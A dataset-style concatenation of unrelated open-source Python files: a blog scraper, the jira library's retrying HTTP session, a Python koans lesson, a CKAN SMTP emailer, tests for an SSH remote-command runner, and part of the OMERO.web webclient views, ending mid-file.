f=open('allarticles.txt','w')
searchstr='<h1 class="entry-title"><a href="'
l=len(searchstr)
urls=[]
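# First pass: build the monthly archive URLs for 2012-2016 (plus January 2017),
# scrape each archive page for entry-title links, and write them to allarticles.txt.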
for y in range(5):
for m in range(12):
if m<9:
urls.append('https://blogs.lt.vt.edu/engineeredu/index.php/20%d/0%d/'%(12+y,m+1))
else:
urls.append('https://blogs.lt.vt.edu/engineeredu/index.php/20%d/%d/'%(12+y,m+1))
urls.append('https://blogs.lt.vt.edu/engineeredu/index.php/20%d/0%d/'%(17,1))
for url in urls:
try:
response = urllib2.urlopen(url)
html = response.read()
s=html
idx=s.find(searchstr)
while idx>0:
s=s[(idx+l):]
print>>f, s[0:s.find('"')]
idx=s.find(searchstr)
except:
pass
f.close()
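# Second pass: fetch each collected article URL and save the post body
# (the entry-content div, truncated at the sharing widget) to alltext.txt.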
searchstr='<div class="entry-content">'
l=len(searchstr)
furls=open('allarticles.txt','r')
f=open('alltext.txt','w')
for url in furls:
try:
response = urllib2.urlopen(url)
html = response.read()
s=html
idx=s.find(searchstr)
while idx>0:
s=s[(idx+l):]
print>>f, s[0:s.find('<div class="sharedaddy sd-sharing-enabled">')]
idx=s.find(searchstr)
except:
pass
f.close()
furls.close()
| aicentral/writestyle | Harvester.py | Python | mit | 1,228 |
import json
import logging
import random
import time
from typing import Callable, Optional, Union, cast
from requests import Response, Session
from requests.exceptions import ConnectionError
from jira.exceptions import JIRAError
logging.getLogger("jira").addHandler(logging.NullHandler())
def raise_on_error(r: Optional[Response], verb="???", **kwargs):
"""Handle errors from a Jira Request
Args:
r (Optional[Response]): Response from Jira request
verb (Optional[str]): Request type, e.g. POST. Defaults to "???".
Raises:
JIRAError: If Response is None
JIRAError: for unhandled 400 status codes.
JIRAError: for unhandled 200 status codes.
"""
request = kwargs.get("request", None)
# headers = kwargs.get('headers', None)
if r is None:
raise JIRAError(None, **kwargs)
if r.status_code >= 400:
error = ""
if r.status_code == 403 and "x-authentication-denied-reason" in r.headers:
error = r.headers["x-authentication-denied-reason"]
elif r.text:
try:
response = json.loads(r.text)
if "message" in response:
# Jira 5.1 errors
error = response["message"]
elif "errorMessages" in response and len(response["errorMessages"]) > 0:
# Jira 5.0.x error messages sometimes come wrapped in this array
# Sometimes this is present but empty
errorMessages = response["errorMessages"]
if isinstance(errorMessages, (list, tuple)):
error = errorMessages[0]
else:
error = errorMessages
# Catching only 'errors' that are dict. See https://github.com/pycontribs/jira/issues/350
elif (
"errors" in response
and len(response["errors"]) > 0
and isinstance(response["errors"], dict)
):
# Jira 6.x error messages are found in this array.
error_list = response["errors"].values()
error = ", ".join(error_list)
else:
error = r.text
except ValueError:
error = r.text
raise JIRAError(
error,
status_code=r.status_code,
url=r.url,
request=request,
response=r,
**kwargs,
)
# for debugging weird errors on CI
if r.status_code not in [200, 201, 202, 204]:
raise JIRAError(
status_code=r.status_code, request=request, response=r, **kwargs
)
# testing for the bug exposed on
# https://answers.atlassian.com/questions/11457054/answers/11975162
if (
r.status_code == 200
and len(r.content) == 0
and "X-Seraph-LoginReason" in r.headers
and "AUTHENTICATED_FAILED" in r.headers["X-Seraph-LoginReason"]
):
pass
class ResilientSession(Session):
"""This class is supposed to retry requests that do return temporary errors.
At this moment it supports: 502, 503, 504
"""
def __init__(self, timeout=None):
self.max_retries = 3
self.max_retry_delay = 60
self.timeout = timeout
super().__init__()
# Indicate our preference for JSON to avoid https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551
self.headers.update({"Accept": "application/json,*.*;q=0.9"})
def __recoverable(
self,
response: Optional[Union[ConnectionError, Response]],
url: str,
request,
counter: int = 1,
):
msg = str(response)
if isinstance(response, ConnectionError):
logging.warning(
f"Got ConnectionError [{response}] errno:{response.errno} on {request} {url}\n{vars(response)}\n{response.__dict__}"
)
if isinstance(response, Response):
if response.status_code in [502, 503, 504, 401]:
# 401 UNAUTHORIZED still randomly returned by Atlassian Cloud as of 2017-01-16
msg = f"{response.status_code} {response.reason}"
# 2019-07-25: Disabled recovery for codes above^
return False
elif not (
response.status_code == 200
and len(response.content) == 0
and "X-Seraph-LoginReason" in response.headers
and "AUTHENTICATED_FAILED" in response.headers["X-Seraph-LoginReason"]
):
return False
else:
msg = "Atlassian's bug https://jira.atlassian.com/browse/JRA-41559"
# Exponential backoff with full jitter.
delay = min(self.max_retry_delay, 10 * 2 ** counter) * random.random()
logging.warning(
"Got recoverable error from %s %s, will retry [%s/%s] in %ss. Err: %s"
% (request, url, counter, self.max_retries, delay, msg)
)
if isinstance(response, Response):
logging.debug("response.headers: %s", response.headers)
logging.debug("response.body: %s", response.content)
time.sleep(delay)
return True
def __verb(
self, verb: str, url: str, retry_data: Callable = None, **kwargs
) -> Response:
d = self.headers.copy()
d.update(kwargs.get("headers", {}))
kwargs["headers"] = d
# if we pass a dictionary as the 'data' we assume we want to send json
# data
data = kwargs.get("data", {})
if isinstance(data, dict):
data = json.dumps(data)
retry_number = 0
exception = None
response = None
while retry_number <= self.max_retries:
response = None
exception = None
try:
method = getattr(super(), verb.lower())
response = method(url, timeout=self.timeout, **kwargs)
if response.status_code >= 200 and response.status_code <= 299:
return response
except ConnectionError as e:
logging.warning(f"{e} while doing {verb.upper()} {url}")
exception = e
retry_number += 1
if retry_number <= self.max_retries:
response_or_exception = response if response is not None else exception
if self.__recoverable(
response_or_exception, url, verb.upper(), retry_number
):
if retry_data:
# if data is a stream, we cannot just read again from it,
# retry_data() will give us a new stream with the data
kwargs["data"] = retry_data()
continue
else:
break
if exception is not None:
raise exception
raise_on_error(response, verb=verb, **kwargs)
# after raise_on_error, only Response objects are allowed through
response = cast(Response, response) # tell mypy only Response-like are here
return response
def get(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("GET", str(url), **kwargs)
def post(self, url: Union[str, bytes], data=None, json=None, **kwargs) -> Response: # type: ignore
return self.__verb("POST", str(url), data=data, json=json, **kwargs)
def put(self, url: Union[str, bytes], data=None, **kwargs) -> Response: # type: ignore
return self.__verb("PUT", str(url), data=data, **kwargs)
def delete(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("DELETE", str(url), **kwargs)
def head(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("HEAD", str(url), **kwargs)
def patch(self, url: Union[str, bytes], data=None, **kwargs) -> Response: # type: ignore
return self.__verb("PATCH", str(url), data=data, **kwargs)
def options(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("OPTIONS", str(url), **kwargs)
| pycontribs/jira | jira/resilientsession.py | Python | bsd-2-clause | 8,330 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutAsserts(Koan):
def test_assert_truth(self):
"""
We shall contemplate truth by testing reality, via asserts.
"""
# Confused? This video should help:
#
# http://bit.ly/about_asserts
self.assertTrue(True) # This should be true
def test_assert_with_message(self):
"""
Enlightenment may be more easily achieved with appropriate messages.
"""
self.assertTrue(True, "This should be true -- and it is true")
def test_fill_in_values(self):
"""
Sometimes we will ask you to fill in the values
"""
self.assertEqual(2, 1 + 1)
def test_assert_equality(self):
"""
To understand reality, we must compare our expectations against
reality.
"""
expected_value = 2
actual_value = 1 + 1
self.assertTrue(expected_value == actual_value)
def test_a_better_way_of_asserting_equality(self):
"""
Some ways of asserting equality are better than others.
"""
expected_value = 2
actual_value = 1 + 1
self.assertEqual(expected_value, actual_value)
def test_that_unittest_asserts_work_the_same_way_as_python_asserts(self):
"""
Understand what lies within.
"""
# This throws an AssertionError exception
assert True
def test_that_sometimes_we_need_to_know_the_class_type(self):
"""
What is in a class name?
"""
# Sometimes we will ask you what the class type of an object is.
#
        # For example, contemplate the text string "naval". What is its class type?
# The koans runner will include this feedback for this koan:
#
# AssertionError: '-=> str <=-' != <type 'str'>
#
# So "naval".__class__ is equal to <type 'str'>? No not quite. This
# is just what it displays. The answer is simply str.
#
# See for yourself:
self.assertEqual(str, "naval".__class__) # It's str, not <type 'str'>
# Need an illustration? More reading can be found here:
#
# http://bit.ly/__class__
| LeMeteore/python_koans | python2/koans/about_asserts.py | Python | mit | 2,275 |
import logging
import smtplib
import cgi
from socket import error as socket_error
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email import Encoders
from smtplib import SMTPRecipientsRefused
from pylons import config
log = logging.getLogger(__name__)
SMTP_SERVER = config.get('smtp.server', '')
SMTP_USER = config.get('smtp.user', '')
SMTP_PASSWORD = config.get('smtp.password', '')
SMTP_FROM = config.get('smtp.mail_from')
def send_email(content, to, subject, file=None):
'''Sends email
:param content: The body content for the mail.
:type string:
:param to: To whom will be mail sent
:type string:
:param subject: The subject of mail.
:type string:
:rtype: string
'''
msg = MIMEMultipart()
from_ = SMTP_FROM
if isinstance(to, basestring):
to = [to]
msg['Subject'] = subject
msg['From'] = from_
msg['To'] = ','.join(to)
content = """\
<html>
<head></head>
<body>
<span>""" + content + """</span>
</body>
</html>
"""
msg.attach(MIMEText(content, 'html', _charset='utf-8'))
if isinstance(file, cgi.FieldStorage):
part = MIMEBase('application', 'octet-stream')
part.set_payload(file.file.read())
Encoders.encode_base64(part)
extension = file.filename.split('.')[-1]
header_value = 'attachment; filename=attachment.{0}'.format(extension)
part.add_header('Content-Disposition', header_value)
msg.attach(part)
try:
s = smtplib.SMTP(SMTP_SERVER)
if SMTP_USER:
s.login(SMTP_USER, SMTP_PASSWORD)
s.sendmail(from_, to, msg.as_string())
s.quit()
response_dict = {
'success': True,
'message': 'Email message was successfully sent.'
}
return response_dict
except SMTPRecipientsRefused:
error = {
'success': False,
'error': {
'fields': {
                'recepient': 'Invalid email recipient, maintainer not '
'found'
}
}
}
return error
except socket_error:
log.critical('Could not connect to email server. Have you configured '
'the SMTP settings?')
error_dict = {
'success': False,
            'message': 'An error occurred while sending the email. Try again.'
}
return error_dict
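# Illustrative call (recipient address and body are placeholders):
#   send_email('<p>New data request</p>', '[email protected]', 'New data request')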
| ViderumGlobal/ckanext-requestdata | ckanext/requestdata/emailer.py | Python | agpl-3.0 | 2,576 |
from raptiformica.shell.execute import COMMAND_TIMEOUT
from raptiformica.shell.raptiformica import run_raptiformica_command
from tests.testcase import TestCase
class TestRunRaptiformicaCommand(TestCase):
def setUp(self):
self.log = self.set_up_patch('raptiformica.shell.raptiformica.log')
self.execute_process = self.set_up_patch(
'raptiformica.shell.execute.execute_process'
)
self.process_output = (0, 'standard out output', '')
self.execute_process.return_value = self.process_output
def test_run_raptiformica_command_logs_running_raptiformica_command_message(self):
run_raptiformica_command(
"export PYTHONPATH=.; ./bin/raptiformica_mesh.py --verbose",
'1.2.3.4', port=2222
)
self.assertTrue(self.log.info.called)
def test_run_raptiformica_command_runs_raptiformica_command_on_the_remote_host(self):
run_raptiformica_command(
"export PYTHONPATH=.; ./bin/raptiformica_mesh.py --verbose",
'1.2.3.4', port=2222
)
expected_command = [
'/usr/bin/env', 'ssh', '-A',
'-o', 'ConnectTimeout=5',
'-o', 'StrictHostKeyChecking=no',
'-o', 'ServerAliveInterval=10',
'-o', 'ServerAliveCountMax=3',
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'PasswordAuthentication=no',
'[email protected]', '-p', '2222',
'sh', '-c',
'"cd /usr/etc/raptiformica; '
'export PYTHONPATH=.; '
'./bin/raptiformica_mesh.py --verbose"'
]
self.execute_process.assert_called_once_with(
expected_command,
buffered=False,
shell=False,
timeout=COMMAND_TIMEOUT
)
def test_run_raptiformica_command_raises_error_if_remote_raptiformica_command_fails(self):
process_output = (1, 'standard out output', 'standard error output')
self.execute_process.return_value = process_output
with self.assertRaises(RuntimeError):
run_raptiformica_command(
"export PYTHONPATH=.; ./bin/raptiformica_mesh.py --verbose",
'1.2.3.4', port=2222
)
def test_run_raptiformica_command_returns_remote_command_exit_code(self):
ret = run_raptiformica_command(
"export PYTHONPATH=.; ./bin/raptiformica_mesh.py --verbose",
'1.2.3.4', port=2222
)
self.assertEqual(ret, 0)
| vdloo/raptiformica | tests/unit/raptiformica/shell/raptiformica/test_run_raptiformica_command.py | Python | mit | 2,513 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2016 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
''' A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything.'''
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
from time import time
from omero_version import build_year
from omero_version import omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import Http404, HttpResponse, HttpResponseRedirect, \
JsonResponse
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.template import RequestContext as Context
from django.utils.http import urlencode
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_str
from django.core.servers.basehttp import FileWrapper
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from webclient_utils import _formatReport, _purgeCallback
from forms import GlobalSearchForm, ContainerForm
from forms import ShareForm, BasketShareForm
from forms import ContainerNameForm, ContainerDescriptionForm
from forms import CommentAnnotationForm, TagsAnnotationForm
from forms import MetadataFilterForm, MetadataDetectorForm
from forms import MetadataChannelForm, MetadataEnvironmentForm
from forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from forms import MetadataStageLabelForm, MetadataLightSourceForm
from forms import MetadataDichroicForm, MetadataMicroscopeForm
from forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from controller.container import BaseContainer
from controller.history import BaseCalendar
from controller.search import BaseSearch
from controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import chgrpMarshal
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import Show, IncorrectMenuError, \
paths_to_object, paths_to_tag
from omeroweb.decorators import ConnCleaningHttpResponse, parse_url
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import ProjectI, DatasetI, ImageI, \
ScreenI, PlateI, \
ProjectDatasetLinkI, DatasetImageLinkI, \
ScreenPlateLinkI, AnnotationAnnotationLinkI, TagAnnotationI
from omero import ApiUsageException, ServerError, CmdError
from omero.rtypes import rlong, rlist
from omeroweb.webgateway.views import LoginView
import tree
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())
def get_long_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
val = None
val_raw = request.GET.get(name, default)
if val_raw is not None:
val = long(val_raw)
return val
def get_longs(request, name):
"""
Retrieves parameters from the request. If the parameters are not present
an empty list is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
vals = []
vals_raw = request.GET.getlist(name)
for val_raw in vals_raw:
vals.append(long(val_raw))
return vals
def get_bool_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
return toBoolean(request.GET.get(name, default))
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
context = {"version": omero_version, 'build_year': build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
context['template'] = settings.INDEX_TEMPLATE
except Exception:
context['template'] = 'webclient/index.html'
context["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
context['template'] = 'webclient/index.html'
return context
##############################################################################
# views
class WebclientLoginView(LoginView):
"""
Webclient Login - Customises the superclass LoginView
for webclient. Also can be used by other Apps to log in to OMERO. Uses
the 'server' id from request to lookup the server-id (index), host and
port from settings. E.g. "localhost", 4064. Stores these details, along
with username, password etc in the request.session. Resets other data
parameters in the request.session. Tries to get connection to OMERO and
if this works, then we are redirected to the 'index' page or url
specified in REQUEST. If we can't connect, the login page is returned
with appropriate error messages.
"""
template = "webclient/login.html"
useragent = 'OMERO.web'
def get(self, request):
"""
GET simply returns the login page
"""
return self.handle_not_logged_in(request)
def handle_logged_in(self, request, conn, connector):
"""
We override this to provide webclient-specific functionality
such as cleaning up any previous sessions (if user didn't logout)
and redirect to specified url or webclient index page.
"""
# webclient has various state that needs cleaning up...
# if 'active_group' remains in session from previous
# login, check it's valid for this user
if request.session.get('active_group'):
if (request.session.get('active_group') not in
conn.getEventContext().memberOfGroups):
del request.session['active_group']
if request.session.get('user_id'):
# always want to revert to logged-in user
del request.session['user_id']
if request.session.get('server_settings'):
# always clean when logging in
del request.session['server_settings']
        # do we need to display the server version?
# server_version = conn.getServerVersion()
if request.POST.get('noredirect'):
return HttpResponse('OK')
url = request.GET.get("url")
if url is None or len(url) == 0:
try:
url = parse_url(settings.LOGIN_REDIRECT)
except:
url = reverse("webindex")
return HttpResponseRedirect(url)
def handle_not_logged_in(self, request, error=None, form=None):
"""
Returns a response for failed login.
Reason for failure may be due to server 'error' or because
of form validation errors.
@param request: http request
@param error: Error message
@param form: Instance of Login Form, populated with data
"""
if form is None:
server_id = request.GET.get('server', request.POST.get('server'))
if server_id is not None:
initial = {'server': unicode(server_id)}
form = LoginForm(initial=initial)
else:
form = LoginForm()
context = {
'version': omero_version,
'build_year': build_year,
'error': error,
'form': form}
url = request.GET.get("url")
if url is not None and len(url) != 0:
context['url'] = urlencode({'url': url})
if hasattr(settings, 'LOGIN_LOGO'):
context['LOGIN_LOGO'] = settings.LOGIN_LOGO
t = template_loader.get_template(self.template)
c = Context(request, context)
rsp = t.render(c)
return HttpResponse(rsp)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
""" Keeps the OMERO session alive by pinging the server """
# login_required handles ping, timeout etc, so we don't need to do
# anything else
return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
Finally this redirects to the 'url'.
"""
switch_active_group(request)
url = url or reverse("webindex")
return HttpResponseRedirect(url)
def switch_active_group(request, active_group=None):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
"""
if active_group is None:
active_group = request.GET.get('active_group')
active_group = int(active_group)
if ('active_group' not in request.session or
active_group != request.session['active_group']):
request.session.modified = True
request.session['active_group'] = active_group
def fake_experimenter(request, default_name='All members'):
"""
Marshal faked experimenter when id is -1
Load omero.client.ui.menu.dropdown.everyone.label as username
"""
label = request.session.get('server_settings').get('ui', {}) \
.get('menu', {}).get('dropdown', {}).get('everyone', {}) \
.get('label', default_name)
return {
'id': -1,
'omeName': label,
'firstName': label,
'lastName': '',
}
@login_required(login_redirect='webindex')
def logout(request, conn=None, **kwargs):
"""
Logout of the session and redirects to the homepage (will redirect to
login first)
"""
if request.method == "POST":
try:
try:
conn.close()
except:
logger.error('Exception during logout.', exc_info=True)
finally:
request.session.flush()
return HttpResponseRedirect(reverse("webindex"))
else:
context = {
'url': reverse('weblogout'),
'submit': "Do you want to log out?"}
t = template_loader.get_template(
'webgateway/base/includes/post_form.html')
c = Context(request, context)
return HttpResponse(t.render(c))
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
"""
This view handles most of the top-level pages, as specified by 'menu' E.g.
userdata, usertags, history, search etc.
Query string 'path' that specifies an object to display in the data tree
is parsed.
We also prepare the list of users in the current group, for the
switch-user form. Change-group form is also prepared.
"""
request.session.modified = True
template = kwargs.get('template', None)
if template is None:
if menu == 'userdata':
template = "webclient/data/containers.html"
elif menu == 'usertags':
template = "webclient/data/containers.html"
else:
# E.g. search/search.html
template = "webclient/%s/%s.html" % (menu, menu)
# tree support
show = kwargs.get('show', Show(conn, request, menu))
# Constructor does no loading. Show.first_selected must be called first
# in order to set up our initial state correctly.
try:
first_sel = show.first_selected
except IncorrectMenuError, e:
return HttpResponseRedirect(e.uri)
# We get the owner of the top level object, E.g. Project
# Actual api_paths_to_object() is retrieved by jsTree once loaded
initially_open_owner = show.initially_open_owner
# need to be sure that tree will be correct omero.group
if first_sel is not None:
switch_active_group(request, first_sel.details.group.id.val)
# search support
init = {}
global_search_form = GlobalSearchForm(data=request.POST.copy())
if menu == "search":
if global_search_form.is_valid():
init['query'] = global_search_form.cleaned_data['search_query']
# get url without request string - used to refresh page after switch
# user/group etc
url = kwargs.get('load_template_url', None)
if url is None:
url = reverse(viewname="load_template", args=[menu])
# validate experimenter is in the active group
active_group = (request.session.get('active_group') or
conn.getEventContext().groupId)
# prepare members of group...
leaders, members = conn.getObject(
"ExperimenterGroup", active_group).groupSummary()
userIds = [u.id for u in leaders]
userIds.extend([u.id for u in members])
# check any change in experimenter...
user_id = request.GET.get('experimenter')
if initially_open_owner is not None:
if (request.session.get('user_id', None) != -1):
# if we're not already showing 'All Members'...
user_id = initially_open_owner
try:
user_id = long(user_id)
except:
user_id = None
    # check if user_id is in the current group
if user_id is not None:
if (user_id not in
(set(map(lambda x: x.id, leaders))
| set(map(lambda x: x.id, members))) and user_id != -1):
# All users in group is allowed
user_id = None
if user_id is None:
# ... or check that current user is valid in active group
user_id = request.session.get('user_id', None)
if user_id is None or int(user_id) not in userIds:
if user_id != -1: # All users in group is allowed
user_id = conn.getEventContext().userId
request.session['user_id'] = user_id
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
groups = myGroups
new_container_form = ContainerForm()
# colleagues required for search.html page only.
myColleagues = {}
if menu == "search":
for g in groups:
g.loadLeadersAndMembers()
for c in g.leaders + g.colleagues:
myColleagues[c.id] = c
myColleagues = myColleagues.values()
myColleagues.sort(key=lambda x: x.getLastName().lower())
context = {
'menu': menu,
'init': init,
'myGroups': myGroups,
'new_container_form': new_container_form,
'global_search_form': global_search_form}
context['groups'] = groups
context['myColleagues'] = myColleagues
context['active_group'] = conn.getObject(
"ExperimenterGroup", long(active_group))
context['active_user'] = conn.getObject("Experimenter", long(user_id))
context['initially_select'] = show.initially_select
context['isLeader'] = conn.isLeader()
context['current_url'] = url
context['page_size'] = settings.PAGE
context['template'] = template
return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
return _load_template(request=request, menu=menu, conn=conn,
url=url, **kwargs)
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
"""
Loads html content of the Groups/Users drop-down menu on main webclient
pages.
Url should be supplied in request, as target for redirect after switching
group.
"""
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
if conn.isAdmin(): # Admin can see all groups
system_groups = [
conn.getAdminService().getSecurityRoles().userGroupId,
conn.getAdminService().getSecurityRoles().guestGroupId]
groups = [g for g in conn.getObjects("ExperimenterGroup")
if g.getId() not in system_groups]
groups.sort(key=lambda x: x.getName().lower())
else:
groups = myGroups
for g in groups:
g.loadLeadersAndMembers() # load leaders / members
context = {
'template': 'webclient/base/includes/group_user_content.html',
'current_url': url,
'groups': groups,
'myGroups': myGroups}
return context
@login_required()
def api_group_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
member_id = get_long_or_default(request, 'member', -1)
except ValueError as e:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get the groups
groups = tree.marshal_groups(conn=conn,
member_id=member_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'groups': groups})
@login_required()
def api_experimenter_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get the experimenters
experimenters = tree.marshal_experimenters(conn=conn,
group_id=group_id,
page=page,
limit=limit)
return JsonResponse({'experimenters': experimenters})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
# Validate parameter
try:
experimenter_id = long(experimenter_id)
except ValueError:
return HttpResponseBadRequest('Invalid experimenter id')
try:
# Get the experimenter
if experimenter_id < 0:
experimenter = fake_experimenter(request)
else:
# Get the experimenter
experimenter = tree.marshal_experimenter(
conn=conn, experimenter_id=experimenter_id)
return JsonResponse({'experimenter': experimenter})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
experimenter_id = get_long_or_default(request, 'id', -1)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
# While this interface does support paging, it does so in a
# very odd way. The results per page is enforced per query so this
# will actually get the limit for projects, datasets (without
# parents), screens and plates (without parents). This is fine for
# the first page, but the second page may not be what is expected.
r = dict()
try:
# Get the projects
r['projects'] = tree.marshal_projects(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
# Get the orphaned datasets (without project parents)
r['datasets'] = tree.marshal_datasets(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
# Get the screens for the current user
r['screens'] = tree.marshal_screens(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
# Get the orphaned plates (without project parents)
r['plates'] = tree.marshal_plates(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
# Get the orphaned images container
try:
orph_t = request \
.session['server_settings']['ui']['tree']['orphans']
except:
orph_t = {'enabled': True}
if (conn.isAdmin() or
conn.isLeader(gid=request.session.get('active_group')) or
experimenter_id == conn.getUserId() or
orph_t.get('enabled', True)):
orphaned = tree.marshal_orphaned(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
orphaned['name'] = orph_t.get('name', "Orphaned Images")
r['orphaned'] = orphaned
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(r)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
project_id = get_long_or_default(request, 'id', None)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get the datasets
datasets = tree.marshal_datasets(conn=conn,
project_id=project_id,
group_id=group_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'datasets': datasets})
@login_required()
def api_image_list(request, conn=None, **kwargs):
''' Get a list of images
        Specifying dataset_id will return only images in that dataset
        Specifying experimenter_id will return orphaned images for that
        user
        The orphaned images will include images which belong to the user
        but are not in any dataset belonging to the user
        If both are specified, experimenter_id is currently ignored
'''
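    # Illustrative query strings (values are placeholders; routing is defined in urls.py):
    #   ?id=<dataset_id>                       -> images in that dataset
    #   ?orphaned=true&experimenter_id=<id>    -> that user's orphaned images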
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
dataset_id = get_long_or_default(request, 'id', None)
orphaned = get_bool_or_default(request, 'orphaned', False)
load_pixels = get_bool_or_default(request, 'sizeXYZ', False)
thumb_version = get_bool_or_default(request, 'thumbVersion', False)
date = get_bool_or_default(request, 'date', False)
experimenter_id = get_long_or_default(request,
'experimenter_id', -1)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
# Share ID is in kwargs from api/share_images/<id>/ which will create
# a share connection in @login_required.
# We don't support ?share_id in query string since this would allow a
# share connection to be created for ALL urls, instead of just this one.
share_id = 'share_id' in kwargs and long(kwargs['share_id']) or None
try:
# Get the images
images = tree.marshal_images(conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
dataset_id=dataset_id,
share_id=share_id,
load_pixels=load_pixels,
group_id=group_id,
page=page,
date=date,
thumb_version=thumb_version,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'images': images})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
# Get parameters
try:
